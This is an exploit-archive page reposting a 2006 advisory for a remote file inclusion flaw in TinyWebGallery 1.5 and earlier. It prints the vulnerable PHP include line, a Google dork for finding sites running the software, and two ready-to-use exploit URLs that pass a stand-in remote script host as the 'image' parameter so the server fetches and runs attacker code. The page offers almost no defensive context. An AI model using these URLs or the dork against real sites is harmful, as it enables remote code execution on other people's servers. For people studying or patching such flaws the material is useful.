首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities


http://www.gipsky.com/
####################################################
# #
# #
# C Y B E R - W A R R i O R T I M #
# #
# #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

###########################################################################
# #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
# #
###########################################################################

[2006-08-09]
<< Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8